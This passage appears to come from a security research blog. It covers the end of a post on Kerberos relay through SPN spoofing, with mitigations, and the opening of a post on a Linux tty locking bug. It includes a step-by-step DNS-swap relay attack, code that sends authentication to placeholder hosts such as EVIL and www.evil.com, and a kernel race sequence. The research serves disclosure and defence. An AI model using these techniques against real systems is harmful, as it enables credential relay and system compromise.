You might assume that the SPN always having the HTTP service class would be a problem. However, the Active Directory default SPN mapping will map HTTP to the HOST service class which is always registered. Therefore you can target any domain joined system without needing to register an explicit SPN. As long as the receiving service doesn't then verify the SPN it will work to authenticate to the computer account, which is used by privileged services. You can use the following PowerShell script to list all the configured SPN mappings in a domain.

PS> $base_dn = (Get-ADRootDSE).configurationNamingContext
PS> $dn = "CN=Directory Service,CN=Windows NT,CN=Services,$base_dn"
PS> (Get-ADObject $dn -Properties sPNMappings).sPNMappings

One interesting behavior of WinINET is that it always requests Kerberos delegation, although that will only be useful if the SPN's target account is registered for delegation. I couldn't convince WinINET to default to a Kerberos-only mode; sending back a WWW-Authenticate: Kerberos header causes the authentication process to stop. This means the Kerberos AP_REQ will always have Integrity enabled, even though the user agent doesn't explicitly request it.

Another user of WinINET is Office. For example, you can set a document template located at an HTTP URL; just opening the Word document will generate Windows authentication if the URL is in the Intranet zone. This is probably a good vector for getting the authentication started, rather than relying on Internet Explorer being available.

WinINET does have some feature controls which can be enabled on a per-executable basis and which affect the behavior of the SPN lookup process, specifically FEATURE_USE_CNAME_FOR_SPN_KB911149 and FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771. However, these only seem to come into play if the HTTP connection is being proxied, which we're assuming isn't the case.

WinHTTP (WebDAV WebClient)

The WinHTTP library is an alternative to WinINET in client applications. It has a cleaner API and doesn't carry the baggage of being used in Internet Explorer. As an example client I chose the built-in WebDAV WebClient service, because it has the interesting property of converting a UNC file name request into a potentially exploitable HTTP request. If the WebClient service is installed and running, opening a file of the form \\EVIL\abc will cause an HTTP request to be sent out to a server under the attacker's control.
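
As a rough sketch of triggering it (EVIL is a placeholder hostname; the assumption, matching the description above, is that once SMB fails the request falls through to the WebDAV redirector):

#include <windows.h>

int main(void) {
    /* With the WebClient service running, opening this UNC path ends up
       being handled by the WebDAV redirector, which sends an HTTP request
       to the named host. */
    HANDLE h = CreateFileW(L"\\\\EVIL\\abc\\file.txt", GENERIC_READ,
                           FILE_SHARE_READ, NULL, OPEN_EXISTING,
                           FILE_ATTRIBUTE_NORMAL, NULL);
    if (h != INVALID_HANDLE_VALUE)
        CloseHandle(h);
    return 0;
}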

From what I can tell, the behavior of WinHTTP when used with the WebClient service is almost exactly the same as for WinINET. I could exploit the SPN generation through local DNS resolution, but not from a public DNS name record. WebDAV seems to consider undotted names to be in the Intranet zone; however, the default for WinHTTP seems to depend on whether the connection would bypass the proxy. The automatic authentication decision is based on the value of the WINHTTP_OPTION_AUTOLOGON_POLICY policy.

At least as used with WebDAV, WinHTTP accepts a WWW-Authenticate header of Kerberos; however, it ends up using the Negotiate package regardless, so Integrity will always be enabled. It also enables Kerberos delegation automatically, like WinINET.

Chromium M93

Chromium based browsers such as Chrome and Edge are open source so it's a bit easier to check the implementation. By default Chromium will automatically authenticate to intranet zone sites, it uses the same Internet Security Manager used by WinINET to make the zone determination in URLSecurityManagerWin::CanUseDefaultCredentials. An administrator can set GPOs to change this behavior to only allow automatic authentication to a set of hosts.

The SPN is generated in HttpAuthHandlerNegotiate::CreateSPN which is called from HttpAuthHandlerNegotiate::DoResolveCanonicalNameComplete. While the documentation for CreateSPN mentions it's basically a copy of the behavior in IE, it technically isn't. Instead of taking the canonical name from the initial DNS request it does a second DNS request, and the result of that is used to generate the SPN.

This second DNS request is important as it means that we now have a way of exploiting this from a public DNS name. If you set the TTL of the initial host DNS record to a very low value, then it's possible to change the DNS response between the lookup for the host to connect to and the lookup for the canonical name to use for the SPN.

This also works with local DNS resolution, though in that case the response doesn't need to be switched, as one response is sufficient. The second DNS lookup behavior can be disabled with a GPO. If it is disabled, neither local DNS resolution nor public DNS will work, as Chromium will use the host specified in the URL for the SPN.

In a domain environment where the Chromium browser is configured to only authenticate to Intranet sites we can abuse the fact that by default authenticated users can add new DNS records to the Microsoft DNS server through LDAP (see this blog post by Kevin Robertson). Using the domain's DNS server is useful as the DNS record could be looked up using a short Intranet name rather than a public DNS name meaning it's likely to be considered a target for automatic authentication.

One problem with using LDAP to add the DNS record is that the DNS server only refreshes its records from LDAP every 180 seconds or more. This would make it difficult to switch the response from a normal address record to a CNAME record in a short enough time frame to be useful. Instead we can add an NS record to the DNS server which forwards the lookup to our own DNS server. As long as the TTL of the DNS response is short, the domain's DNS server will re-request the record and we can return different responses without waiting for the DNS server to update from LDAP. This is very similar to a DNS rebinding attack, except that instead of swapping the IP address, we're swapping the canonical name.

Diagram of two DNS request attack against Chromium

Therefore a working exploit as shown in the diagram would be the following:

  1. Register an NS record with the DNS server for evilhost.domain.com using existing authenticated credentials via LDAP. Wait for the DNS server to pick up the record.
  2. Direct the browser to connect to http://evilhost. This allows Chromium to automatically authenticate as it's an undotted Intranet host. The browser will lookup evilhost.domain.com by adding its primary DNS suffix.
  3. This request goes to the client's DNS server, which then follows the NS record and performs a recursive query to the attacker's DNS server.
  4. The attacker's DNS server returns a normal address record for their HTTP server with a very short TTL.
  5. The browser makes a request to the HTTP server, at this point the attacker delays the response long enough for the cached DNS request to expire. It can then return a 401 to get the browser to authenticate.
  6. The browser makes a second DNS lookup for the canonical name. As the original request has expired, another will be made for evilhost.domain.com. For this lookup the attacker returns a CNAME record for the fileserver.domain.com target. The client's DNS server will look up the IP address for the CNAME host and return that.
  7. The browser will generate the SPN based on the CNAME record and that'll be used to generate the AP_REQ, sending it to the attacker's HTTP server.
  8. The attacker can relay the AP_REQ to the target server.

It's possible that we can combine the local and public DNS attack mechanisms to only need one DNS request. In this case we could set up an NS record to our own DNS server and get the client to resolve the hostname. The client's DNS server would do a recursive query, and at this point our DNS server shouldn't respond immediately. We could then start a classic DNS spoofing attack to return a DNS response packet directly to the client with the spoofed address record.

In general DNS spoofing is limited by requiring the source IP address, transaction ID and the UDP source port to match before the DNS client will accept the response packet. The source IP address should be spoofable on a local network and the client's IP address can be known ahead of time through an initial HTTP connection, so the only problems are the transaction ID and port.

As most clients have a relatively long timeout of 3-5 seconds, that might be enough time to try the majority of the combinations for the ID and port. Of course there isn't really a penalty for trying multiple times. If this attack was practical then you could do the attack on a local network even if local DNS resolution was disabled and enable the attack for libraries which only do a single lookup such as WinINET and WinHTTP. The response could have a long TTL, so that when the access is successful it doesn't need to be repeated for every request.

I couldn't get Chromium to downgrade Negotiate to raw Kerberos, so Integrity will be enabled. Also, since Delegation is not enabled by default, an administrator needs to configure an allow-list GPO to specify which targets are allowed to receive delegated credentials.

A bonus quirk for Chromium: it seems to be the only browser which still supports URL-based user credentials. If you pass user credentials in the request and get the server to return a request for Negotiate authentication, it'll authenticate automatically regardless of the zone of the site. You can also pass credentials using XMLHttpRequest::open.

While not very practical, this can be used to test a user's password from an arbitrary host. If the username/password is correct and the SPN is spoofed then Chromium will send a validated Kerberos AP_REQ, otherwise either NTLM or no authentication will be sent.

NTLM can always be generated as it doesn't require any proof that the password is valid, whereas Kerberos requires the password to be correct for the authentication to succeed. You need to specify the domain name when authenticating, so you use a URL of the form http://DOMAIN%5CUSER:PASSWORD@www.domain.com.

One other quirk of this is that you can specify a fully qualified domain name (FQDN) and user name, and the Windows Kerberos implementation will try to authenticate using that server based on the DNS SRV records. For example, http://EVIL.COM%5CUSER:PASSWORD@www.domain.com will try to authenticate to the Kerberos service specified through the _kerberos._tcp.evil.com SRV record. This trick works even on non-domain-joined systems to generate Kerberos authentication, though it's not clear whether it has any practical use.

It's worth noting that I did discuss the implications of the Chromium HTTP vector with team members internally, and the general conclusion was that this behavior is by design, as it's trying to copy the behavior expected of existing user agents such as IE. Therefore there was no expectation it would be fixed.

Firefox 91

As with Chromium, Firefox is open source so we can find the implementation. Unlike the other HTTP implementations researched up to this point, Firefox doesn't perform Windows authentication by default. An administrator needs to configure either a list of hosts that are allowed to automatically authenticate, or the network.negotiate-auth.allow-non-fqdn setting can be enabled to authenticate to non-dotted host names.

If authentication is enabled, it works with both local DNS resolution and public DNS, as it does a second DNS lookup when constructing the SPN for Negotiate in nsAuthSSPI::MakeSN. Unlike Chromium, there doesn't seem to be a setting to disable this behavior.

Once again I couldn't get Firefox to use raw Kerberos, so Integrity is enabled. Also Delegation is not enabled unless an administrator configures the network.negotiate-auth.delegation-uris setting.

.NET Framework 4.8

The .NET Framework 4.8 officially has two HTTP libraries, the original System.Net.HttpWebRequest and derived APIs and the newer System.Net.Http.HttpClient API. However in the .NET framework the newer API uses the older one under the hood, so we'll only consider the older of the two.

Windows authentication is only generated automatically if the UseDefaultCredentials property is set to true on the HttpWebRequest object, as shown below (technically this sets the CredentialCache.DefaultCredentials object, but it's easier to use the boolean property). Once the default credentials are set, the client will automatically authenticate using Windows authentication to any host; it doesn't seem to care whether that host is in the Intranet zone.

var request = WebRequest.CreateHttp("http://www.evil.com");
request.UseDefaultCredentials = true;
var response = (HttpWebResponse)request.GetResponse();

The SPN is generated in the System.Net.AuthenticationState.GetComputeSpn function, which we can find in the .NET reference source. The SPN is built from the canonical name returned by the initial DNS lookup, which means it supports the local DNS resolution attack but not the public one. If you follow the code, it does support doing a second DNS lookup if the host is undotted, but as far as I can tell only when the client code sets an explicit Host header. Note that the code here is slightly different in .NET 2.0, which might support looking up the canonical name as long as the host name is undotted, but I've not verified that.

The .NET Framework supports specifying Kerberos directly as the authentication type in the WWW-Authentication header. As the client code doesn't explicitly request integrity, this allows the Kerberos AP_REQ to not have Integrity enabled.

The code also supports the WWW-Authentication header having an initial token, so even if Kerberos wasn't directly supported, you could use Negotiate and specify the stub token I described at the start to force Kerberos authentication. For example returning the following header with the initial 401 status response will force Kerberos through auto-detection:

WWW-Authenticate: Negotiate AAFA

Finally, the authentication code always enables delegation regardless of the target host.

.NET 5.0

The .NET 5.0 runtime has deprecated the HttpWebRequest API in favor of the HttpClient API. It uses a new backend class called the SocketsHttpHandler. As it's all open source we can find the implementation, specifically the AuthenticationHelper class which is a complete rewrite from the .NET Framework version.

To automatically authenticate, the client code must either use the HttpClientHandler class and set its UseDefaultCredentials property as shown below, or, if using SocketsHttpHandler, set the Credentials property to the default credentials. This handler must then be specified when creating the HttpClient object.

var handler = new HttpClientHandler();
handler.UseDefaultCredentials = true;
var client = new HttpClient(handler);
await client.GetStringAsync("http://www.evil.com");

Unless the client specifies an explicit Host header in the request, the authentication will do a DNS lookup for the canonical name. This is separate from the DNS lookup for the HTTP connection, so it supports both the local and public DNS attacks.

While the implementation doesn't support Kerberos directly like the .NET Framework, it does support passing an initial token so it's still possible to force raw Kerberos which will disable the Integrity requirement.

.NET 6.0

The .NET 6.0 runtime is basically the same as .NET 5.0, except that Integrity is specified explicitly when creating the client authentication context. This means that rolling back to Kerberos no longer has any advantage. This change seems to be down to a broken implementation of NTLM on macOS rather than an anti-NTLM-relay measure.

HTTP Overview

The following table summarizes the results of the HTTP protocol research:

  • The LLMNR column indicates it's possible to influence the SPN using a local DNS resolver attack
  • DNS CNAME indicates a public DNS resolving attack
  • Delegation indicates the HTTP user agent enables Kerberos delegation
  • Integrity indicates that integrity protection is requested, which reduces the usefulness of the relayed authentication if the target server automatically detects the setting.

User Agent                     | LLMNR | DNS CNAME | Delegation | Integrity
-------------------------------|-------|-----------|------------|----------
Internet Explorer 11 (WinINET) | Yes   | No        | Yes        | Yes
WebDAV (WinHTTP)               | Yes   | No        | Yes        | Yes
Chromium (M93)                 | Yes   | Yes       | No†        | Yes
Firefox 91                     | Yes   | Yes       | No†        | Yes
.NET Framework 4.8             | Yes   | No‡       | Yes        | No
.NET 5.0                       | Yes   | Yes       | No         | No
.NET 6.0                       | Yes   | Yes       | No         | Yes

† Chromium and Firefox can enable delegation only on a per-site basis through a GPO.

‡ .NET Framework supports DNS resolving in special circumstances for non-dotted hostnames.

By far the most permissive client is .NET 5.0. It supports authenticating to any host as long as it has been configured to authenticate automatically. It also supports arbitrary SPN spoofing from a public DNS name, as well as disabling integrity through Kerberos fallback. However, as .NET 5.0 is designed to be usable cross-platform, it's possible that few libraries written with it in mind will ever enable automatic authentication.

LDAP

Windows has a built-in general purpose LDAP library in wldap32.dll. This is used by the majority of OS components when accessing Active Directory and is also used by the .NET LdapConnection class. There doesn't seem to be a way of specifying the SPN manually for the LDAP connection using the API. Instead it's built manually from the canonical name returned by the DNS lookup. Therefore it's exploitable in a similar manner to WinINET via local DNS resolution.

The name of the LDAP server can also be found by querying for a SRV record for the hostname. This is used to support accessing the LDAP server from the top-level Windows domain name. The SRV lookup will usually return an address record alongside; all this does is change the server resolution process, which doesn't seem to give any advantage for exploitation.

Whether the LDAP client enables integrity checking is based on the value of the LDAP_OPT_SIGN flag. As the connection only supports Negotiate authentication, the client passes the ISC_REQ_NO_INTEGRITY flag if signing is disabled, so that the server won't auto-detect the signing capability from the Negotiate MIC and accidentally enable signing protection.
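
As a minimal client-side sketch of that option (dc.domain.com is a placeholder; error handling omitted):

#include <windows.h>
#include <winldap.h>
#pragma comment(lib, "wldap32.lib")

int main(void) {
    LDAP *ld = ldap_initW(L"dc.domain.com", LDAP_PORT);
    /* With LDAP_OPT_OFF here, wldap32 passes ISC_REQ_NO_INTEGRITY so the
       server doesn't auto-detect signing support from the Negotiate MIC. */
    ldap_set_optionW(ld, LDAP_OPT_SIGN, LDAP_OPT_ON);
    /* NULL credentials: authenticate as the current user via Negotiate. */
    ldap_bind_sW(ld, NULL, NULL, LDAP_AUTH_NEGOTIATE);
    ldap_unbind(ld);
    return 0;
}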

As part of recent changes to LDAP signing the client is forced to enable Integrity by the LdapClientIntegrity policy. This means that regardless of whether the LDAP server needs integrity protection it'll be enabled on the client which in turn will automatically enable it on the server. Changing the value of LDAP_OPT_SIGN in the client has no effect once this policy is enabled.

SMB

SMB is one of the most commonly exploited protocols for NTLM relay, as it's easy to convert access to a file into authentication. It would be convenient if it was also exploitable for Kerberos relay. While SMBv1 is deprecated and not even installed on newer installs of Windows, it's still worth looking at the implementation of v1 and v2 to determine if either are exploitable.

The client implementations of SMB 1 and 2 are in mrxsmb10.sys and mrxsmb20.sys respectively with some common code in mrxsmb.sys. Both protocols support specifying a name for the SPN which is related to DFS. The SPN name needs to be specified through the GUID_ECP_DOMAIN_SERVICE_NAME_CONTEXT ECP and is only enabled if the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag in the GUID_ECP_NETWORK_OPEN_CONTEXT ECP (set by MUP) is specified. This is related to UNC hardening which was added to protect things like group policies.

It's easy enough to trigger the conditions to set the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag. The default UNC hardening rules always add SYSVOL and NETLOGON UNC paths with a wildcard hostname, so a request to \\evil.com\SYSVOL will cause the flag to be set and the SPN to be potentially overridable. The server should be a DFS server for this to work; however, even with the flag set I've not found a way of setting an arbitrary SPN value remotely.

Even if you could spoof the SPN, the SMB clients always enable Integrity protection. Like LDAP, SMB will enable signing and encryption opportunistically if available from the client, unless UNC hardening measures are in place.

Marshaled Target Information SPN

While investigating the SMB implementation I noticed something interesting. The SMB clients use the function SecMakeSPNEx2 to build the SPN value from the service class and name. You might assume this would just return the SPN as-is, however that's not the case. Instead for the hostname of fileserver with the service class cifs you get back an SPN which looks like the following:

cifs/fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA

Looking at the implementation of SecMakeSPNEx2 it makes a call to the API function CredMarshalTargetInfo. This API takes a list of target information in a CREDENTIAL_TARGET_INFORMATION structure and marshals it using a base64 string encoding. This marshaled string is then appended to the end of the real SPN.

The code is therefore just appending some additional target information to the end of the SPN, presumably so it's easier to pass around. My initial assumption would be this information is stripped off before passing to the SSPI APIs by the SMB client. However, passing this SPN value to InitializeSecurityContext as the target name succeeds and gets a Kerberos service ticket for cifs/fileserver. How does that work?

Inside the function SspiExProcessSecurityContext in lsasrv.dll, which is the main entrypoint of InitializeSecurityContext, there's a call to the CredUnmarshalTargetInfo API, which parses the marshaled target information. However SspiExProcessSecurityContext doesn't care about the unmarshalled results, instead it just gets the length of the marshaled data and removes that from the end of the target SPN string. Therefore before the Kerberos package gets the target name it has already been restored to the original SPN.
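
This is easy to reproduce with a minimal SSPI sketch (the target name is the example string from above; error handling omitted). If it succeeds, the output buffer receives an AP_REQ for cifs/fileserver even though the target name passed in looks nothing like that:

#define SECURITY_WIN32
#include <windows.h>
#include <security.h>
#pragma comment(lib, "secur32.lib")

int main(void) {
    CredHandle cred;
    CtxtHandle ctx;
    TimeStamp expiry;
    ULONG attrs;
    AcquireCredentialsHandleW(NULL, L"Kerberos", SECPKG_CRED_OUTBOUND,
                              NULL, NULL, NULL, NULL, &cred, &expiry);

    /* SPN with the marshaled target information still appended. */
    WCHAR spn[] = L"cifs/fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA";
    SecBuffer tok = { 0, SECBUFFER_TOKEN, NULL };
    SecBufferDesc out = { SECBUFFER_VERSION, 1, &tok };
    /* LSA strips the marshaled suffix before the Kerberos package sees the
       target, so this requests a ticket for cifs/fileserver. */
    return InitializeSecurityContextW(&cred, NULL, spn, ISC_REQ_ALLOCATE_MEMORY,
                                      0, SECURITY_NATIVE_DREP, NULL, 0,
                                      &ctx, &out, &attrs, &expiry);
}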

The encoded SPN shown earlier, minus the service class, is a valid DNS component name and therefore could be used as the hostname in a public or local DNS resolution request. This is interesting, as it potentially gives a way of spoofing a hostname which is distinct from the real target service but which, when processed by the SSPI API, requests the spoofed service ticket. That is, if you use the string fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA as the DNS name, and the client appends a service class to the name and passes it to SSPI, it will get a service ticket for fileserver, while the DNS resolution can trivially return an unrelated IP address.

There are some big limitations to abusing this behavior. The marshaled target information must be valid: the last 6 characters are an encoded length of the entire marshaled buffer, and the buffer is prefixed with a 28-byte header with a magic value of 0x91856535 in the first 4 bytes. If this length is invalid (e.g. larger than the buffer or not a multiple of 2) or the magic isn't present, the CredUnmarshalTargetInfo call fails and SspiExProcessSecurityContext leaves the SPN as is, which will subsequently fail to query a Kerberos ticket for the SPN.

The easiest way for the name to become invalid is by being converted to lowercase. DNS is case-insensitive, but servers are generally case-preserving, so you could look up the case-sensitive name and the DNS server would return it unmodified. However, the HTTP clients tested all seem to lowercase the hostname before use, so by the time it's used to build an SPN it's a different string. When unmarshalling, 'a' and 'A' represent different binary values, so parsing of the marshaled information will fail.

Another issue is that the size limit of a single name in DNS is 63 characters. The minimum valid marshaled buffer is 44 characters long, leaving only 19 characters for the SPN part. This is at least larger than the minimum NetBIOS name limit of 15 characters, so as long as an SPN is registered for that shorter name it should be sufficient. However, if there's no short SPN name registered, it's going to be more difficult to exploit.

In theory you could specify the SPN using its FQDN. However it's hard to construct such a name. The length value must be at the end of the string and needs to be a valid marshaled value so you can't have any dots within its 6 characters. It's possible to have a TLD which is 6 characters or longer and as the embedded marshaled values are not escaped this can be used to construct a valid FQDN which would then resolve to another SPN target. For example:

fileserver1UWhRCAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAA.domain.oBAAAA

is a valid DNS name which would resolve to an SPN for fileserver. Except that oBAAAA is not a valid public TLD. Pulling the list of valid TLDs from ICANN's website and converting all values which are 6 characters or longer into the expected length value, the smallest length which is a multiple of 2 is from WEBCAM which results in a DNS name at least 264331 characters long, which is somewhat above the 255 character limit usually considered valid for a FQDN in DNS.

Therefore this would still be limited to more local attacks and only for limited sets of protocols. For example an authenticated user could register a DNS entry for the local domain using this value and trick an RPC client to connect to it using its undotted hostname. As long as the client doesn't modify the name other than putting the service class on it (or it gets automatically generated by the RPC runtime) then this spoofs the SPN for the request.

Microsoft's Response to the Research

I didn't initially start looking at Kerberos authentication relay, as mentioned I found it inadvertently when looking at IPsec and AuthIP which I subsequently reported to Microsoft. After doing more research into other network protocols I decided to use the AuthIP issue as a bellwether on Microsoft's views on whether relaying Kerberos authentication and spoofing SPNs would cross a security boundary.

As I mentioned earlier the AuthIP issue was classed as "vNext", which denotes it might be fixed in a future version of Windows, but not as a security update for any currently shipping version of Windows. This was because Microsoft determined it to be a Moderate severity issue (see this for the explanation of the severities). Only Important or above will be serviced.

It seems that the general rule is that any network protocol where the SPN can be spoofed to generate Kerberos authentication which can be relayed, is not sufficient to meet the severity level for a fix. However, any network facing service which can be used to induce authentication where the attacker does not have existing network authentication credentials is considered an Important severity spoofing issue and will be fixed. This is why PetitPotam was fixed as CVE-2021-36942, as it could be exploited from an unauthenticated user.

As my research focused entirely on the network protocols themselves and not the ways of inducing authentication, they will all be covered under the same Moderate severity. This means that if they were to be fixed at all, it'd be in unspecified future versions of Windows.

Available Mitigations

How can you defend yourself against authentication relay attacks presented in this blog post? While I think I've made the case that it's possible to relay Kerberos authentication, it's somewhat more limited in scope than NTLM relay. This means that disabling NTLM is still an invaluable option for mitigating authentication relay issues on a Windows enterprise network.

Also, except for disabling NTLM, all the mitigations for NTLM relay apply to Kerberos relay. Requiring signing or sealing on the protocol if possible is sufficient to prevent the majority of attack vectors, especially on important network services such as LDAP.

For TLS encapsulated protocols, channel binding prevents the authentication being relayed as I didn't find any way of spoofing the TLS certificate at the same time. If the network service supports EPA, such as HTTPS or LDAPS it should be enabled. Even if the protocol doesn't support EPA, enabling TLS protection if possible is still valuable. This not only provides more robust server authentication, which Kerberos mutual authentication doesn't really provide, it'll also hide Kerberos authentication tokens from sniffing or MitM attacks.

Some libraries, such as WinHTTP and .NET, set the undocumented ISC_REQ_UNVERIFIED_TARGET_NAME request attribute when calling InitializeSecurityContext in certain circumstances. This affects the behavior of the server when querying for the SPN used during authentication. Some servers, such as SMB and IIS with EPA, can be configured to validate the SPN. If this request attribute flag is set, the authentication will still succeed, but when the server goes to check the SPN it gets an empty string, which will not match the server's expectations. If you're a developer you should use this flag if the SPN has been provided from an untrustworthy source, although it will only be beneficial if the server checks the received SPN.

A common thread through the research is abusing local DNS resolution to spoof the SPN. Disabling LLMNR and MDNS should always be best practice, and this just highlights the dangers of leaving them enabled. While it might be possible to perform the same attacks through DNS spoofing attacks, these are likely to be much less reliable than local DNS spoofing attacks.

If Windows authentication isn't needed from a network client, it'd be wise to disable it if supported. For example, some HTTP user agents support disabling automatic Windows authentication entirely, while others such as Firefox don't enable it by default. Chromium also supports disabling the DNS lookup process for generating the SPN through group policy.

Finally, blocking untrusted devices on the network such as through 802.1X or requiring authenticated IPsec/IKEv2 for all network communications to high value services would go some way to limiting the impact of all authentication relay attacks. Although of course, an attacker could still compromise a trusted host and use that to mount the attack.

Conclusions

I hope that this blog post has demonstrated that Kerberos relay attacks are feasible and just disabling NTLM is not a sufficient mitigation strategy in an enterprise environment. While DNS is a common thread and is the root cause of the majority of these protocol issues, it's still possible to spoof SPNs using other protocols such as AuthIP and MSRPC without needing to play DNS tricks.

While I wrote my own tooling to perform the LLMNR attack there are various public tools which can mount an LLMNR and MDNS spoofing attack such as the venerable Python Responder. It shouldn't be hard to modify one of the tools to verify my findings.

I've also not investigated every possible network protocol which might perform Kerberos authentication. I've also not looked at non-Windows systems which might support Kerberos such as Linux and macOS. It's possible that in more heterogeneous networks the impact might be more pronounced as some of the security changes in Microsoft's Kerberos implementation might not be present.

If you're doing your own research into this area, you should look at how the SPN is specified by the protocol, but also how the implementation builds it. For example the HTTP Negotiate RFC states how to build the SPN for Kerberos, but then each implementation does it slightly differently and not to the RFC specification.

You should be especially wary of any protocol where an untrusted server can specify an arbitrary SPN. This is the case in AuthIP, MSRPC and DCOM. It's almost certain that when these protocols were originally designed many years ago, that no thought was given to the possible abuse of this design for relaying the Kerberos network authentication.

How a simple Linux kernel memory corruption bug can lead to complete system compromise


An analysis of current and potential kernel security mitigations

Posted by Jann Horn, Project Zero

Introduction

This blog post describes a straightforward Linux kernel locking bug and how I exploited it against Debian Buster's 4.19.0-13-amd64 kernel. Based on that, it explores options for security mitigations that could prevent or hinder exploitation of issues similar to this one.

I hope that stepping through such an exploit and sharing this compiled knowledge with the wider security community can help with reasoning about the relative utility of various mitigation approaches.

A lot of the individual exploitation techniques and mitigation options that I am describing here aren't novel. However, I believe that there is value in writing them up together to show how various mitigations interact with a fairly normal use-after-free exploit.

Our bugtracker entry for this bug, along with the proof of concept, is at https://bugs.chromium.org/p/project-zero/issues/detail?id=2125.

Code snippets in this blog post that are relevant to the exploit are taken from the upstream 4.19.160 release, since that is what the targeted Debian kernel is based on; some other code snippets are from mainline Linux.

(In case you're wondering why the bug and the targeted Debian kernel are from end of last year: I already wrote most of this blogpost around April, but only recently finished it)

I would like to thank Ryan Hileman for a discussion we had a while back about how static analysis might fit into static prevention of security bugs (but note that Ryan hasn't reviewed this post and doesn't necessarily agree with any of my opinions). I also want to thank Kees Cook for providing feedback on an earlier version of this post (again, without implying that he necessarily agrees with everything), and my Project Zero colleagues for reviewing this post and frequent discussions about exploit mitigations.

Background for the bug

On Linux, terminal devices (such as a serial console or a virtual console) are represented by a struct tty_struct. Among other things, this structure contains fields used for the job control features of terminals, which are usually modified using a set of ioctls:

struct tty_struct {
[...]
        spinlock_t ctrl_lock;
[...]
        struct pid *pgrp;               /* Protected by ctrl lock */
        struct pid *session;
[...]
        struct tty_struct *link;
[...]
}[...];

The pgrp field points to the foreground process group of the terminal (normally modified from userspace via the TIOCSPGRP ioctl); the session field points to the session associated with the terminal. Both of these fields do not point directly to a process/task, but rather to a struct pid. struct pid ties a specific incarnation of a numeric ID to a set of processes that use that ID as their PID (also known in userspace as TID), TGID (also known in userspace as PID), PGID, or SID. You can kind of think of it as a weak reference to a process, although that's not entirely accurate. (There's some extra nuance around struct pid when execve() is called by a non-leader thread, but that's irrelevant here.)

All processes that are running inside a terminal and are subject to its job control refer to that terminal as their "controlling terminal" (stored in ->signal->tty of the process).

A special type of terminal device are pseudoterminals, which are used when you, for example, open a terminal application in a graphical environment or connect to a remote machine via SSH. While other terminal devices are connected to some sort of hardware, both ends of a pseudoterminal are controlled by userspace, and pseudoterminals can be freely created by (unprivileged) userspace. Every time /dev/ptmx (short for "pseudoterminal multiplexor") is opened, the resulting file descriptor represents the device side (referred to in documentation and kernel sources as "the pseudoterminal master") of a new pseudoterminal. You can read from it to get the data that should be printed on the emulated screen, and write to it to emulate keyboard inputs. The corresponding terminal device (to which you'd usually connect a shell) is automatically created by the kernel under /dev/pts/<number>.

One thing that makes pseudoterminals particularly strange is that both ends of the pseudoterminal have their own struct tty_struct, which point to each other using the link member, even though the device side of the pseudoterminal does not have terminal features like job control - so many of its members are unused.

Many of the ioctls for terminal management can be used on both ends of the pseudoterminal; but no matter on which end you call them, they affect the same state, sometimes with minor differences in behavior. For example, in the ioctl handler for TIOCGPGRP:

/**
 *      tiocgpgrp               -       get process group
 *      @tty: tty passed by user
 *      @real_tty: tty side of the tty passed by the user if a pty else the tty
 *      @p: returned pid
 *
 *      Obtain the process group of the tty. If there is no process group
 *      return an error.
 *
 *      Locking: none. Reference to current->signal->tty is safe.
 */
static int tiocgpgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
        struct pid *pid;
        int ret;
        /*
         * (tty == real_tty) is a cheap way of
         * testing if the tty is NOT a master pty.
         */
        if (tty == real_tty && current->signal->tty != real_tty)
                return -ENOTTY;
        pid = tty_get_pgrp(real_tty);
        ret =  put_user(pid_vnr(pid), p);
        put_pid(pid);
        return ret;
}

As documented in the comment above, these handlers receive a pointer real_tty that points to the normal terminal device; an additional pointer tty is passed in that can be used to figure out on which end of the terminal the ioctl was originally called. As this example illustrates, the tty pointer is normally only used for things like pointer comparisons. In this case, it is used to prevent TIOCGPGRP from working when called on the terminal side by a process which does not have this terminal as its controlling terminal.

Note: If you want to know more about how terminals and job control are intended to work, the book "The Linux Programming Interface" provides a nice introduction to how these older parts of the userspace API are supposed to work. It doesn't describe any of the kernel internals though, since it's written as a reference for userspace programming. And it's from 2010, so it doesn't have anything in it about new APIs that have showed up over the last decade.

The bug

The bug was in the ioctl handler tiocspgrp:

/**
 *      tiocspgrp               -       attempt to set process group
 *      @tty: tty passed by user
 *      @real_tty: tty side device matching tty passed by user
 *      @p: pid pointer
 *
 *      Set the process group of the tty to the session passed. Only
 *      permitted where the tty session is our session.
 *
 *      Locking: RCU, ctrl lock
 */
static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
        struct pid *pgrp;
        pid_t pgrp_nr;
[...]
        if (get_user(pgrp_nr, p))
                return -EFAULT;
[...]
        pgrp = find_vpid(pgrp_nr);
[...]
        spin_lock_irq(&tty->ctrl_lock);
        put_pid(real_tty->pgrp);
        real_tty->pgrp = get_pid(pgrp);
        spin_unlock_irq(&tty->ctrl_lock);
[...]
}

The pgrp member of the terminal side (real_tty) is being modified, and the reference counts of the old and new process group are adjusted accordingly using put_pid and get_pid; but the lock is taken on tty, which can be either end of the pseudoterminal pair, depending on which file descriptor we pass to ioctl(). So by simultaneously calling the TIOCSPGRP ioctl on both sides of the pseudoterminal, we can cause data races between concurrent accesses to the pgrp member. This can cause reference counts to become skewed through the following races:

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
    real_tty->pgrp = get_pid(A)
                                        real_tty->pgrp = get_pid(B)
    spin_unlock_irq(...)                spin_unlock_irq(...)

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
                                        real_tty->pgrp = get_pid(B)
    real_tty->pgrp = get_pid(A)
    spin_unlock_irq(...)                spin_unlock_irq(...)

In both cases, the refcount of the old struct pid is decremented by 1 too much, and either A's or B's is incremented by 1 too much.
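
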